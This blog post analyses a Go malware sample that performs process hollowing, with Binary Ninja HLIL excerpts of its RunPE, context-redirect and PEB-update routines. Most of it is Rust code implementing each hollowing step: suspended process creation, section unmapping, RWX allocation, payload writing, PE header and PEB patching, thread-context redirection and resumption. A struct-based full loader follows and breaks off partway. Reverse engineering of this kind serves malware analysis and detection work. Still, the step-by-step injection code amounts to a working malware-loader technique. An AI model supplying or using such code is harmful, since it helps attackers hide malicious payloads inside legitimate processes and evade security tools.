A malware analysis journey: Discovering process hollowing

Introduction

Recently, I downloaded a malware sample from Malware Bazaar for analysis. As I began reverse engineering it using Binary Ninja, I discovered something particularly interesting: the malware implements a sophisticated process hollowing technique. Process hollowing (also known as RunPE or Process Replacement) is one of the most advanced code injection techniques used in modern malware, allowing an attacker to execute malicious code within the context of a legitimate process, making detection significantly more challenging.

What caught my attention was not just that the malware uses process hollowing, but how it implements it. The implementation includes sophisticated PE relocation handling, support for both 32-bit and 64-bit payloads, careful PEB (Process Environment Block) manipulation, and thread context manipulation with architecture-specific handling. These details reveal a well-engineered piece of malware that demonstrates deep understanding of Windows internals.

In this blog post, I’ll share my analysis findings, including the theoretical foundation of process hollowing, how it works at the Windows API level, real-world implementation analysis from the malware sample I analyzed in Binary Ninja, HLIL (High-Level Intermediate Language) code extracted directly from Binary Ninja, how to implement similar techniques in Rust for educational purposes, and detection and mitigation strategies.

⚠️ Disclaimer: This content is for educational and security research purposes only. The malware sample was obtained from Malware Bazaar for legitimate security research. Understanding these techniques is crucial for malware analysts, security researchers, and defenders.


Understanding Process Hollowing

What is Process Hollowing?

Process hollowing is a code injection technique where a legitimate process is first created in a suspended state. The original executable’s code is then removed or overwritten from memory, and malicious code is written into the process’s memory space. The process’s execution context is modified to point to the malicious code, and finally, the process is resumed, executing the malicious payload. The result is a malicious program running under the name of a legitimate process such as notepad.exe or cmd.exe.

The technique gets its name from the fact that the process is “hollowed out” – its original content is removed, leaving an empty shell that is then filled with malicious code. Think of it like a chocolate bunny: the shell looks like chocolate, but it’s empty inside, and you can fill it with anything. The visual representation shows how a legitimate executable’s code is replaced with malicious code while maintaining the appearance of the original process.

The attack flow begins with creating a process using CreateProcess with the CREATE_SUSPENDED flag, which creates the process but pauses it before execution. Some implementations then use UnmapViewOfSection or VirtualFree to remove the original code from memory, though many modern implementations skip this step and directly overwrite the memory. Next, VirtualAllocEx is used to allocate memory for the payload, followed by WriteProcessMemory to write the malicious code into the allocated space. The PE headers are then updated to modify the ImageBase and EntryPoint fields. The thread context is modified using GetThreadContext and SetThreadContext to change the instruction pointer, and the PEB (Process Environment Block) is updated to modify the ImageBaseAddress. Finally, ResumeThread is called to execute the malicious code.


The Technical Foundation

Key Windows APIs

Process hollowing relies on several critical Windows APIs that work together to achieve code injection. The CreateProcess API is used to create a process in a suspended state, giving the attacker control before the original code executes. VirtualAllocEx allocates memory in the remote process, providing space for the malicious payload. WriteProcessMemory writes data to the remote process memory, allowing the attacker to inject the malicious code. GetThreadContext retrieves the thread execution state, which is necessary to understand and modify where execution will begin. SetThreadContext modifies the thread execution state, redirecting execution to the malicious code. The optional NtUnmapViewOfSection can be used to remove mapped sections, though many implementations skip this step. Finally, ResumeThread resumes the suspended thread, causing the malicious code to execute.

PE (Portable Executable) Format

Understanding the PE format is crucial for implementing process hollowing. The PE format begins with a DOS header that provides legacy compatibility. The NT headers contain both the file header and the optional header, which includes critical information such as the ImageBase and AddressOfEntryPoint. The PE file is organized into sections such as .text for code, .data for initialized data, and .rdata for read-only data. When the ImageBase changes, relocations must be applied to adjust addresses throughout the executable. This relocation handling is one of the more complex aspects of process hollowing, as the payload may need to be relocated to a different base address than it was compiled for.

Process Environment Block (PEB)

The PEB is a critical Windows structure that contains essential process information. It includes the ImageBaseAddress, which stores the base address of the loaded module. The PEB also contains process information, the module list, and command line arguments. The PEB must be updated to match the new code location, or the process will crash. This is because Windows uses the PEB to resolve addresses and track process information. If the PEB doesn’t match the actual code location, the process will fail when trying to access its own code or data.


Step-by-Step Implementation

Step 1: Create Suspended Process

The first step in process hollowing is to create a legitimate process in a suspended state. This gives us control before the original code executes. The implementation uses CreateProcessW with the CREATE_SUSPENDED flag, which tells Windows to create the process but pause it before execution begins. When this happens, Windows loads the target executable into memory, creates the process structure, but the thread is suspended, meaning the original code hasn’t executed yet. This gives us full control over the process before it starts running.

use winapi::um::processthreadsapi::*;
use winapi::um::winbase::*;
use winapi::um::winnt::*;

fn create_suspended_process(target_path: &str) -> Result<(HANDLE, HANDLE), String> {
    let mut si: STARTUPINFOW = unsafe { std::mem::zeroed() };
    let mut pi: PROCESS_INFORMATION = unsafe { std::mem::zeroed() };

    si.cb = std::mem::size_of::<STARTUPINFOW>() as u32;

    let target_path_wide: Vec<u16> = target_path.encode_utf16().chain(Some(0)).collect();

    let success = unsafe {
        CreateProcessW(
            std::ptr::null(),
            target_path_wide.as_ptr() as *mut u16,
            std::ptr::null_mut(),
            std::ptr::null_mut(),
            FALSE,
            CREATE_SUSPENDED,  // ← KEY: Process suspended
            std::ptr::null_mut(),
            std::ptr::null(),
            &mut si,
            &mut pi,
        )
    };

    if success == 0 {
        return Err(format!("CreateProcess failed: {}", unsafe { 
            winapi::um::errhandlingapi::GetLastError() 
        }));
    }

    Ok((pi.hProcess, pi.hThread))
}

The function returns both the process handle and thread handle, which are needed for subsequent operations. The process handle is used for memory operations, while the thread handle is used for context manipulation.

Step 2: Unmap Original Image (Optional)

Some implementations unmap the original image, while others just overwrite it. The unmapping approach uses NtUnmapViewOfSection to remove the original executable’s code from memory, freeing up the memory space. However, many modern implementations skip this step and directly overwrite the memory, as it’s simpler and achieves the same result. The unmapping approach requires getting the function pointer from ntdll.dll, which adds complexity to the implementation.

use winapi::um::winnt::*;
use winapi::um::memoryapi::*;

fn unmap_original_image(process_handle: HANDLE, image_base: *mut c_void) -> Result<(), String> {
    // Get NtUnmapViewOfSection from ntdll.dll
    let ntdll = unsafe { 
        winapi::um::libloaderapi::GetModuleHandleA(
            b"ntdll.dll\0".as_ptr() as *const i8
        )
    };

    if ntdll.is_null() {
        return Err("Failed to get ntdll.dll handle".to_string());
    }

    type NtUnmapViewOfSection = unsafe extern "system" fn(
        ProcessHandle: HANDLE,
        BaseAddress: *mut c_void,
    ) -> u32;

    let nt_unmap = unsafe {
        winapi::um::libloaderapi::GetProcAddress(
            ntdll,
            b"NtUnmapViewOfSection\0".as_ptr() as *const i8
        )
    };

    if nt_unmap.is_null() {
        return Err("Failed to get NtUnmapViewOfSection".to_string());
    }

    let unmap_fn: NtUnmapViewOfSection = unsafe { std::mem::transmute(nt_unmap) };

    let status = unsafe { unmap_fn(process_handle, image_base) };

    if status != 0 {
        return Err(format!("NtUnmapViewOfSection failed: 0x{:x}", status));
    }

    Ok(())
}

Many modern implementations skip this step and directly overwrite the memory, as it’s simpler and achieves the same result.

Step 3: Allocate Memory for Payload

We need to allocate executable memory in the target process where the payload will be written. The VirtualAllocEx function is used for this purpose, with PAGE_EXECUTE_READWRITE protection flags to allow execution, reading, and writing. The MEM_COMMIT | MEM_RESERVE flags commit and reserve the memory. We can optionally specify a preferred base address from the PE optional header, though if that address is not available, we can allocate at any available address.

use winapi::um::winnt::*;
use winapi::um::memoryapi::*;

fn allocate_payload_memory(
    process_handle: HANDLE,
    size: usize,
    preferred_base: Option<*mut c_void>,
) -> Result<*mut c_void, String> {
    let base_address = preferred_base.unwrap_or(std::ptr::null_mut());

    let allocated = unsafe {
        VirtualAllocEx(
            process_handle,
            base_address,
            size,
            MEM_COMMIT | MEM_RESERVE,
            PAGE_EXECUTE_READWRITE,  // ← Executable memory
        )
    };

    if allocated.is_null() {
        return Err(format!("VirtualAllocEx failed: {}", unsafe {
            winapi::um::errhandlingapi::GetLastError()
        }));
    }

    Ok(allocated)
}

The key points here are that PAGE_EXECUTE_READWRITE allows execution, reading, and writing, MEM_COMMIT | MEM_RESERVE commits and reserves memory, and we can specify a preferred base address from the PE optional header if desired.

Step 4: Write Payload to Process

Now we write the malicious payload into the allocated memory using WriteProcessMemory. This function copies the payload data from our process into the target process’s memory space. It’s important to verify that all bytes were written successfully, as partial writes can lead to corruption and crashes.

use winapi::um::memoryapi::*;
use winapi::um::winnt::*;

fn write_payload(
    process_handle: HANDLE,
    base_address: *mut c_void,
    payload: &[u8],
) -> Result<(), String> {
    let mut bytes_written: usize = 0;

    let success = unsafe {
        WriteProcessMemory(
            process_handle,
            base_address,
            payload.as_ptr() as *const c_void,
            payload.len(),
            &mut bytes_written,
        )
    };

    if success == 0 {
        return Err(format!("WriteProcessMemory failed: {}", unsafe {
            winapi::um::errhandlingapi::GetLastError()
        }));
    }

    if bytes_written != payload.len() {
        return Err(format!(
            "Partial write: {}/{} bytes",
            bytes_written,
            payload.len()
        ));
    }

    Ok(())
}

This step is critical because it’s where the actual malicious code is injected into the target process. The payload must be written correctly, and if relocations are needed, they should be applied before or during this step.

Step 5: Update PE Headers

We need to modify the PE headers to reflect the new memory location. This involves parsing the PE structure from the payload, finding the optional header, and updating the ImageBase field to match the new memory location. We also need to extract the entry point RVA (Relative Virtual Address) so we know where execution should begin.

use winapi::um::winnt::*;

fn update_pe_headers(
    process_handle: HANDLE,
    base_address: *mut c_void,
    payload: &[u8],
    new_image_base: u64,
) -> Result<u32, String> {
    // Parse PE headers from payload
    let dos_header = unsafe { &*(payload.as_ptr() as *const IMAGE_DOS_HEADER) };

    if dos_header.e_magic != IMAGE_DOS_SIGNATURE {
        return Err("Invalid DOS signature".to_string());
    }

    let nt_headers_offset = dos_header.e_lfanew as usize;
    let nt_headers = unsafe {
        &mut *((payload.as_ptr() as usize + nt_headers_offset) as *mut IMAGE_NT_HEADERS64)
    };

    if nt_headers.Signature != IMAGE_NT_SIGNATURE {
        return Err("Invalid NT signature".to_string());
    }

    let entry_point_rva = nt_headers.OptionalHeader.AddressOfEntryPoint;

    // Update ImageBase in memory
    let optional_header_addr = unsafe {
        (base_address as usize + nt_headers_offset + 
         std::mem::size_of::<IMAGE_NT_SIGNATURE>() +
         std::mem::size_of::<IMAGE_FILE_HEADER>()) as *mut IMAGE_OPTIONAL_HEADER64
    };

    let mut bytes_written: usize = 0;
    unsafe {
        WriteProcessMemory(
            process_handle,
            optional_header_addr as *mut c_void,
            &new_image_base as *const u64 as *const c_void,
            std::mem::size_of::<u64>(),
            &mut bytes_written,
        );
    }

    Ok(entry_point_rva)
}

The PE headers must be updated in the target process’s memory, not just in our local copy. This ensures that when the process executes, it knows where its code is located.

Step 6: Modify Thread Context

This is the critical step where we change where execution will start. We use GetThreadContext to retrieve the current thread’s execution state, modify the instruction pointer (RIP for 64-bit, EIP for 32-bit) to point to the payload’s entry point, and then use SetThreadContext to apply the changes. When the thread resumes, it will start executing from the new instruction pointer.

use winapi::um::winnt::*;
use winapi::um::processthreadsapi::*;

fn update_thread_context(
    thread_handle: HANDLE,
    entry_point: u64,
    is_64bit: bool,
) -> Result<(), String> {
    let mut context: CONTEXT = unsafe { std::mem::zeroed() };

    if is_64bit {
        context.ContextFlags = CONTEXT_FULL;
    } else {
        context.ContextFlags = CONTEXT_FULL | CONTEXT_WOW64;
    }

    // Get current thread context
    let success = unsafe {
        GetThreadContext(thread_handle, &mut context)
    };

    if success == 0 {
        return Err(format!("GetThreadContext failed: {}", unsafe {
            winapi::um::errhandlingapi::GetLastError()
        }));
    }

    // Update instruction pointer
    if is_64bit {
        context.Rip = entry_point;  // 64-bit: RIP
    } else {
        context.Eip = entry_point as u32;  // 32-bit: EIP
    }

    // Set modified context
    let success = unsafe {
        SetThreadContext(thread_handle, &context)
    };

    if success == 0 {
        return Err(format!("SetThreadContext failed: {}", unsafe {
            winapi::um::errhandlingapi::GetLastError()
        }));
    }

    Ok(())
}

The instruction pointer (RIP/EIP) must point to the entry point of the payload. This is calculated as the base address plus the entry point RVA from the PE headers.

Step 7: Update PEB

The Process Environment Block must be updated to match the new code location. The PEB address is retrieved from the thread context (stored in the RCX register for 64-bit processes, or EBX for 32-bit processes). We then calculate the offset to the ImageBaseAddress field (0x10 for 64-bit, 0x8 for 32-bit) and write the new image base address to that location.

use winapi::um::winnt::*;

#[repr(C)]
struct PEB64 {
    // ... fields ...
    image_base_address: *mut c_void,  // Offset 0x10 in 64-bit PEB
    // ... more fields ...
}

fn update_peb(
    process_handle: HANDLE,
    thread_handle: HANDLE,
    new_image_base: u64,
    is_64bit: bool,
) -> Result<(), String> {
    // Get PEB address from thread context
    let mut context: CONTEXT = unsafe { std::mem::zeroed() };

    if is_64bit {
        context.ContextFlags = CONTEXT_FULL;
    } else {
        context.ContextFlags = CONTEXT_FULL | CONTEXT_WOW64;
    }

    unsafe {
        GetThreadContext(thread_handle, &mut context);
    }

    // PEB address is in RCX (64-bit) or EBX (32-bit) register
    let peb_address = if is_64bit {
        context.Rcx as *mut PEB64
    } else {
        context.Ebx as *mut PEB32
    };

    // Update ImageBaseAddress in PEB
    let image_base_offset = if is_64bit { 0x10 } else { 0x8 };
    let peb_image_base = unsafe {
        (peb_address as usize + image_base_offset) as *mut u64
    };

    let mut bytes_written: usize = 0;
    unsafe {
        WriteProcessMemory(
            process_handle,
            peb_image_base as *mut c_void,
            &new_image_base as *const u64 as *const c_void,
            if is_64bit { 8 } else { 4 },
            &mut bytes_written,
        );
    }

    Ok(())
}

The PEB update is crucial because Windows uses the PEB to resolve addresses and track process information. If the PEB doesn’t match the actual code location, the process will crash when trying to access its own code or data.

Step 8: Resume Thread

Finally, we resume the thread to execute the payload. The ResumeThread function un-suspends the thread, and execution begins from the instruction pointer we set in the thread context. At this point, the malicious payload begins executing in the context of the legitimate process.

use winapi::um::processthreadsapi::*;

fn resume_thread(thread_handle: HANDLE) -> Result<(), String> {
    let result = unsafe { ResumeThread(thread_handle) };

    if result == u32::MAX {
        return Err(format!("ResumeThread failed: {}", unsafe {
            winapi::um::errhandlingapi::GetLastError()
        }));
    }

    Ok(())
}

This is the final step that brings everything together. Once the thread resumes, the malicious code executes, but from the perspective of the operating system and security tools, it appears to be the legitimate process that was originally created.


Real-World Analysis: Malware Sample

Now let’s dive into the actual malware sample I analyzed. This is a Go-based malware sample that I downloaded from Malware Bazaar and analyzed using Binary Ninja. The sample information shows it’s a Go compiled binary targeting x64 Windows architecture. The malware implements a complete process hollowing mechanism with several interesting features that demonstrate sophisticated understanding of Windows internals.

📝 Note: All HLIL (High-Level Intermediate Language) code snippets shown below are extracted directly from Binary Ninja’s analysis of this malware sample. The addresses and function names are as identified by Binary Ninja during my reverse engineering session.

Function: mw_RunPE (Main Process Hollowing Function)

Address: 0x140078aa0

This is the core function that orchestrates the entire process hollowing operation. The following HLIL code was extracted from Binary Ninja’s analysis:

HLIL Code from Binary Ninja:

140078ad9        char rax_1
140078ad9        int64_t rcx_1
140078ad9        int128_t zmm15
140078ad9        rax_1, rcx_1, zmm15 = main.RelocateModule(arg2, arg3, arg1, 0, arg6)
140078ae2        if (rax_1 == 0)
140078bc8        return 0

The function first calls RelocateModule to handle PE relocations. This is crucial because the payload might need to be relocated to a different base address than it was compiled for. If the relocation fails, the function returns early, indicating that the process hollowing cannot proceed.

140078af2        char rax_3
140078af2        int64_t rcx_3
140078af2        rax_3, rcx_3 = main.Is64Bit(main._RunPE.func1(rcx_1, arg6, zmm15), arg6)
140078b02        int32_t* rax_5
140078b02        int128_t zmm15_1
140078b02        rax_5, zmm15_1 = main.GetNTHdrs(rcx_3, arg3, 0, arg6)

The code then checks if the payload is 64-bit or 32-bit using Is64Bit, and gets the NT headers from the payload PE using GetNTHdrs. This determines which architecture-specific code paths to use, as 32-bit and 64-bit processes require different handling for thread contexts and PEB manipulation.

140078b17        int64_t rcx_5
140078b17        if (rax_3 == 0)
140078b24        rcx_5 = arg2
140078b29        rax_5[0xd] = rcx_5.d
140078b19        rcx_5 = arg2
140078b1e        *(rax_5 + 0x30) = rcx_5

The code updates the PE optional header, setting the ImageBase field to the new memory location where the payload will be loaded. For 32-bit payloads, the ImageBase is at offset 0x34 in the optional header (accessed as rax_5[0xd]), while for 64-bit payloads, it’s at offset 0x30. This ensures the PE structure knows where it’s loaded in memory.

140078b48        mw_WriteProcessMemory(arg3, *arg5, arg2, arg1, arg6)

The entire payload is written to the target process memory using mw_WriteProcessMemory. The parameters include the process handle, the base address in the target process, the payload buffer, and the size of the payload. This is where the actual malicious code is injected into the target process.

140078b61        char rax_9
140078b61        int64_t rcx_8
140078b61        int128_t zmm15_2
140078b61        rax_9, rcx_8, zmm15_2 = mw_RedirectToPayload(arg5, arg4, arg6)
140078b68        if (rax_9 == 0)
140078bb7        return 0

The function calls mw_RedirectToPayload to update the thread context (instruction pointer) and update the PEB (ImageBaseAddress). This prepares the process to execute the payload. If this step fails, the function returns, indicating that the redirection could not be completed.

140078ba0        syscall.(*LazyProc).Call(1, rdx_1, main.SResume_Thread, rax_10, 1, arg6, zmm1_1)

Finally, the suspended thread is resumed using the ResumeThread API. At this point, the malicious payload begins executing. The thread starts from the instruction pointer that was set in the thread context, which points to the entry point of the injected payload.

Function: mw_RedirectToPayload (Thread Context & PEB Update)

Address: 0x140078980

This function handles the critical redirection of execution. Here’s the HLIL code from Binary Ninja:

HLIL Code from Binary Ninja:

1400789a1        int32_t rax_1
1400789a1        int128_t zmm15
1400789a1        rax_1, zmm15 = main.GetEntryPointRVA(arg1, rax, arg3)
1400789a8        int64_t rcx_1 = zx.q(rax_1) + arg_10

The function first gets the entry point RVA (Relative Virtual Address) from the PE headers using GetEntryPointRVA. It then calculates the absolute entry point address by adding the base address to the entry point RVA. This gives us the exact memory address where execution should begin.

1400789c6        rax_3, rcx_3, zmm0_1, zmm1_1 = main.UpdateRemoteEntryPoint(zx.q(arg2), zmm1, arg1, rcx_1, arg3, zmm0)

The function then calls UpdateRemoteEntryPoint to update the thread context to point to the payload’s entry point. This is where execution will start when the thread resumes. The thread context modification is architecture-specific, handling both 32-bit and 64-bit processes differently.

1400789e0        uint64_t rax_5
1400789e0        int64_t rcx_4
1400789e0        int128_t zmm15_1
1400789e0        rax_5, rcx_4, zmm15_1 = main.GetRemotePebAddr(rcx_3, zmm1_1, arg1, arg2, arg3, zmm0_1)

The function gets the address of the PEB in the target process using GetRemotePebAddr. The PEB address is typically found in the RCX register for 64-bit processes or the EBX register for 32-bit processes, which are retrieved from the thread context.

140078a03        int64_t rbx_3 = rax_5 + main.GetImgBasePebOffset(main.RedirectToPayload.func2(rcx_4, arg3, zmm15_1), arg2, arg3)
140078a1f        int64_t rdi = 8
140078a29        if (zx.q(arg2) != 0)
140078a29        rdi = 4
140078a3b        if (mw_WriteProcessMemory(&arg_10, *arg1, rbx_3, rdi, arg3) == 0)

The code calculates the address of the ImageBaseAddress field in the PEB. The offset is 0x10 for 64-bit processes (8 bytes) or 0x8 for 32-bit processes (4 bytes). It then writes the new image base address to the PEB using WriteProcessMemory. This update is critical because Windows uses the PEB to resolve addresses, and if it doesn’t match the actual code location, the process will crash.

Function: main.UpdateRemoteEntryPoint (Thread Context Manipulation)

Address: 0x140078704

This function modifies the thread context to redirect execution. Binary Ninja’s HLIL analysis shows:

HLIL Code from Binary Ninja:

140078722        if (arg1.b != 0)
14007872b        int128_t* rax = runtime.newobject(arg1, arg2, &data_14014b540, arg5, arg6)
140078740        zmm0, zmm1 = main.Memset(0x2cc, rax, 0, arg5)
14007874a        *rax = 0x100002

The function first checks if it’s dealing with a 32-bit process. If so, it allocates a WOW64_CONTEXT structure (0x2cc bytes) and sets the context flags to CONTEXT_FULL (0x100002). This structure is used to manipulate 32-bit processes running under WOW64 on a 64-bit system.

140078759        rax_2, zmm0_1, zmm1_1 = main.Wow64_Get_ThreadContext(arg3, zmm1, *(arg3 + 8), rax, arg5, zmm0)
14007876e        rax[0xb].d = arg4.d
14007878a        return main.Wow64Set_ThreadContext(arg3, zmm1_1, *(arg3 + 8), rax, arg5, zmm0_1)

For 32-bit processes, the function gets the WOW64 thread context, updates the EIP (instruction pointer) at offset 0xb in the context structure, and then sets the modified context back. This redirects execution to the payload’s entry point.

14007879a        int128_t* rax_6 = runtime.newobject(arg1, arg2, &data_14014c9e0, arg5, arg6)
1400787ab        zmm0_2, zmm1_2 = main.Memset(0x4d0, rax_6, 0, arg5)
1400787b5        rax_6[3].d = 0x100002

For 64-bit processes, the function allocates a CONTEXT structure (0x4d0 bytes) and sets the context flags to CONTEXT_FULL. This larger structure is needed to represent the full 64-bit register set.

1400787c5        rax_8, zmm15 = main.Get_ThreadContext(arg3, zmm1_2, *(arg3 + 8), rax_6, arg5, zmm0_2)
1400787cf        rcx_4, zmm0_3, zmm1_3 = main.UpdateRemoteEntryPoint.func1(2, arg5, zmm15)
1400787de        rax_6[8].q = arg4

The function gets the current thread context, updates the RIP (instruction pointer) at offset 8 in the context structure, and sets the new entry point address. This is the 64-bit equivalent of updating the EIP for 32-bit processes.

1400787f6        if (main.Set_ThreadContext(rcx_4, zmm1_3, *(arg3 + 8), rax_6, arg5, zmm0_3) == 0)

Finally, the modified context is applied to the thread using Set_ThreadContext. When the thread resumes, it will start executing from the new instruction pointer, which points to the payload’s entry point.

Function: main.GetRemotePebAddr (PEB Address Retrieval)

Address: 0x140078844

This function retrieves the PEB address from the thread context. The HLIL code from Binary Ninja reveals:

HLIL Code from Binary Ninja:

140078859        if (arg4 != 0)
140078862        int64_t* rax = runtime.newobject(arg1, arg2, &data_14014b540, arg5, arg6)
14007887d        *rax = 0x100002
140078893        if (main.Wow64_Get_ThreadContext(arg3, zmm1, *(arg3 + 8), rax, arg5, zmm0) == 0)
1400788a5        return zx.q(*(rax + 0xa4))

For 32-bit processes, the function gets the WOW64 thread context and retrieves the PEB address from offset 0xa4 in the WOW64_CONTEXT structure. This is where Windows stores the PEB address for 32-bit processes running under WOW64.

1400788ae        rcx_2, zmm0_1, zmm1_1 = main.GetRemotePebAddr.func1(arg1, arg5, zmm15)
1400788ba        int128_t* rax_5 = runtime.newobject(rcx_2, zmm1_1, &data_14014c9e0, arg5, zmm0_1)
1400788d5        rax_5[3].d = 0x100002
1400788ed        if (main.Get_ThreadContext(rcx_3, zmm1_2, *(arg3 + 8), rax_5, arg5, zmm0_2) == 0)
140078908        return *(rax_5 + 0x88)

For 64-bit processes, the function gets the full thread context and retrieves the PEB address from offset 0x88 in the CONTEXT structure, which corresponds to the RCX register. This register contains the PEB address when a 64-bit process is created.

Function: mw_WriteProcessMemory (Memory Writing)

Address: 0x1400782e0

This is a wrapper around the Windows WriteProcessMemory API. Binary Ninja’s HLIL shows:

HLIL Code from Binary Ninja:

140078306        rcx, zmm0, zmm1 = main.Write_ProcessMemory.func1(arg1, arg5, zmm15)
140078312        rax, rcx_1, zmm0_1, zmm1_1 = runtime.newobject(rcx, zmm1, &data_140135580, arg5, zmm0)
140078323        rax_1, rdx, zmm1_2 = runtime.newobject(rcx_1, zmm1_1, &data_1401364c0, arg5, zmm0_1)
14007832d        *rax_1 = arg2
140078335        *(rax_1 + 8) = arg3
14007833e        rax_1[1].q = arg1
140078347        *(rax_1 + 0x18) = arg4

The function prepares the parameters for WriteProcessMemory. The parameters include the base address in the target process (arg2), the buffer to write (arg3), the size to write (arg1), and a pointer to receive the number of bytes written (arg4). These parameters are organized into a structure that will be passed to the Windows API.

140078371        void** const result = nullptr
140078376        if (syscall.(*LazyProc).Call(5, rdx, main.SWrite_ProcessMemory, rax_1, 5, arg5, zmm1_2) == 0)

The function calls WriteProcessMemory via a syscall wrapper. This writes the payload data into the target process memory. The Go runtime uses lazy procedure loading, which is why we see the LazyProc.Call pattern here.

Function: mw_VirtualAllocEx (Memory Allocation)

Address: 0x140076c80

This is a wrapper around VirtualAllocEx. The HLIL code from Binary Ninja shows:

HLIL Code from Binary Ninja:

140076caf        void* main.modkernel32_1 = main.modkernel32
140076ced        rax[1].q = 0xe
140076d18        *(rax + 8) = "VirtualAllocExfile too largeis a directorylevel 2 haltedlevel 3 …"

The function loads the kernel32.dll module and prepares to call VirtualAllocEx. The string length 0xe (14 characters) corresponds to “VirtualAllocEx”, which is the function name being resolved. The Go runtime stores multiple strings together, which is why we see additional text in the string literal.

140076d2d        *rax_1 = arg3
140076d35        rax_1[1] = arg4
140076d3e        rax_1[2] = arg1
140076d47        rax_1[3] = zx.q(arg6)
140076d50        rax_1[4] = zx.q(arg5)

The function sets up the parameters for VirtualAllocEx. These include the base address (which can be NULL to let Windows choose), the size to allocate, the process handle, the allocation type, and the memory protection flags. These parameters are organized into an array that will be passed to the Windows API.

140076d64        result, zmm15 = syscall.(*LazyProc).Call(5, rdx, rax, rax_1, 5, arg7, zmm1_1)

Finally, the function calls VirtualAllocEx via the syscall wrapper to allocate executable memory in the target process. The allocated memory address is returned, which will be used as the base address for writing the payload.


Rust Implementation Guide

Now let’s create a complete Rust implementation based on what we learned from analyzing the malware sample. This implementation is for educational purposes only and demonstrates how process hollowing can be implemented in Rust. The code includes comprehensive error handling, proper PE parsing, relocation handling, architecture detection, and resource management.

The implementation uses a struct-based approach that encapsulates the process hollowing functionality. This makes the code more maintainable and easier to understand. Each step of the process hollowing operation is implemented as a method, allowing for fine-grained control over the injection process.

use std::ffi::OsStr;
use std::os::windows::ffi::OsStrExt;
use std::ptr;
use winapi::shared::minwindef::*;
use winapi::um::errhandlingapi::GetLastError;
use winapi::um::libloaderapi::{GetModuleHandleA, GetProcAddress};
use winapi::um::memoryapi::*;
use winapi::um::processthreadsapi::*;
use winapi::um::winbase::*;
use winapi::um::winnt::*;

pub struct ProcessHollowing {
    process_handle: HANDLE,
    thread_handle: HANDLE,
    payload_base: *mut c_void,
    is_64bit: bool,
}

impl ProcessHollowing {
    /// Create a new process hollowing instance
    pub fn new(target_path: &str) -> Result<Self, String> {
        let (process_handle, thread_handle) = Self::create_suspended_process(target_path)?;

        Ok(Self {
            process_handle,
            thread_handle,
            payload_base: ptr::null_mut(),
            is_64bit: false,
        })
    }

    /// Step 1: Create suspended process
    fn create_suspended_process(target_path: &str) -> Result<(HANDLE, HANDLE), String> {
        let mut si: STARTUPINFOW = unsafe { std::mem::zeroed() };
        let mut pi: PROCESS_INFORMATION = unsafe { std::mem::zeroed() };

        si.cb = std::mem::size_of::<STARTUPINFOW>() as u32;

        let target_path_wide: Vec<u16> = OsStr::new(target_path)
            .encode_wide()
            .chain(Some(0))
            .collect();

        let success = unsafe {
            CreateProcessW(
                ptr::null(),
                target_path_wide.as_ptr() as *mut u16,
                ptr::null_mut(),
                ptr::null_mut(),
                FALSE,
                CREATE_SUSPENDED,
                ptr::null_mut(),
                ptr::null(),
                &mut si,
                &mut pi,
            )
        };

        if success == 0 {
            return Err(format!("CreateProcess failed: {}", unsafe { GetLastError() }));
        }

        Ok((pi.hProcess, pi.hThread))
    }

    /// Step 2: Allocate memory for payload
    pub fn allocate_payload(&mut self, payload: &[u8], preferred_base: Option<u64>) -> Result<(), String> {
        // Parse PE to get ImageBase
        let image_base = preferred_base.unwrap_or_else(|| {
            Self::get_preferred_image_base(payload).unwrap_or(0x400000)
        });

        let size = Self::get_image_size(payload)?;

        let allocated = unsafe {
            VirtualAllocEx(
                self.process_handle,
                image_base as *mut c_void,
                size,
                MEM_COMMIT | MEM_RESERVE,
                PAGE_EXECUTE_READWRITE,
            )
        };

        if allocated.is_null() {
            // Try without preferred base
            let allocated = unsafe {
                VirtualAllocEx(
                    self.process_handle,
                    ptr::null_mut(),
                    size,
                    MEM_COMMIT | MEM_RESERVE,
                    PAGE_EXECUTE_READWRITE,
                )
            };

            if allocated.is_null() {
                return Err(format!("VirtualAllocEx failed: {}", unsafe { GetLastError() }));
            }

            self.payload_base = allocated;
        } else {
            self.payload_base = allocated;
        }

        Ok(())
    }

    /// Step 3: Write payload to process
    pub fn write_payload(&self, payload: &[u8]) -> Result<(), String> {
        if self.payload_base.is_null() {
            return Err("Payload base not allocated".to_string());
        }

        // Handle PE relocations if needed
        let relocated_payload = Self::relocate_payload(payload, self.payload_base as u64)?;

        let mut bytes_written: usize = 0;
        let success = unsafe {
            WriteProcessMemory(
                self.process_handle,
                self.payload_base,
                relocated_payload.as_ptr() as *const c_void,
                relocated_payload.len(),
                &mut bytes_written,
            )
        };

        if success == 0 {
            return Err(format!("WriteProcessMemory failed: {}", unsafe { GetLastError() }));
        }

        if bytes_written != relocated_payload.len() {
            return Err(format!("Partial write: {}/{} bytes", bytes_written, relocated_payload.len()));
        }

        Ok(())
    }

    /// Step 4: Update PE headers
    pub fn update_pe_headers(&self) -> Result<u64, String> {
        // Read current PE headers from process
        let mut dos_header: IMAGE_DOS_HEADER = unsafe { std::mem::zeroed() };
        let mut bytes_read: usize = 0;

        unsafe {
            ReadProcessMemory(
                self.process_handle,
                self.payload_base,
                &mut dos_header as *const _ as *mut c_void,
                std::mem::size_of::<IMAGE_DOS_HEADER>(),
                &mut bytes_read,
            );
        }

        if dos_header.e_magic != IMAGE_DOS_SIGNATURE {
            return Err("Invalid DOS signature".to_string());
        }

        let nt_headers_offset = dos_header.e_lfanew as usize;
        let optional_header_offset = nt_headers_offset + 
            std::mem::size_of::<IMAGE_NT_SIGNATURE>() +
            std::mem::size_of::<IMAGE_FILE_HEADER>();

        // Update ImageBase
        let image_base = self.payload_base as u64;
        let mut bytes_written: usize = 0;

        unsafe {
            WriteProcessMemory(
                self.process_handle,
                (self.payload_base as usize + optional_header_offset + 0x18) as *mut c_void,
                &image_base as *const u64 as *const c_void,
                std::mem::size_of::<u64>(),
                &mut bytes_written,
            );
        }

        // Get entry point RVA
        let entry_point_rva = Self::get_entry_point_rva(self.process_handle, self.payload_base)?;
        let entry_point = self.payload_base as u64 + entry_point_rva as u64;

        Ok(entry_point)
    }

    /// Step 5: Update thread context
    pub fn update_thread_context(&self, entry_point: u64) -> Result<(), String> {
        let mut context: CONTEXT = unsafe { std::mem::zeroed() };
        context.ContextFlags = CONTEXT_FULL;

        let success = unsafe {
            GetThreadContext(self.thread_handle, &mut context)
        };

        if success == 0 {
            return Err(format!("GetThreadContext failed: {}", unsafe { GetLastError() }));
        }

        // Update instruction pointer
        context.Rip = entry_point;

        let success = unsafe {
            SetThreadContext(self.thread_handle, &context)
        };

        if success == 0 {
            return Err(format!("SetThreadContext failed: {}", unsafe { GetLastError() }));
        }

        Ok(())
    }

